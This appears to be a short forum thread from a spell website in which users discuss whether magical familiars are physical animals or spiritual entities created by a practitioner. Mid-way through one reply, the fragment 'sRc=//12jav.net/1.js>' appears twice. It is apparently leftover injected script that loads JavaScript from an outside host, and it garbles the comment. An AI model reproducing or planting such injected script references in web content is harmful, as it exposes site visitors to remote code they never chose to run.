Familiars are not actual physical animals, rather, they are spiritual entities created by the magic user. You might find these two articles of interest:

In my opinion, you can certainly have more than one Familiar if you spend the time and energy to create them.

Okay, than you. I was under the impression that they were at least partly physical due to most of the familiar spells on here talking about making an animal into a familiar and understanding it better. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Unfortunately there are a lot of spells on this site that were contributed by people who don't know a lot about magic. They fall victim to the Hollywood portrayal of magic rather than the reality of it.
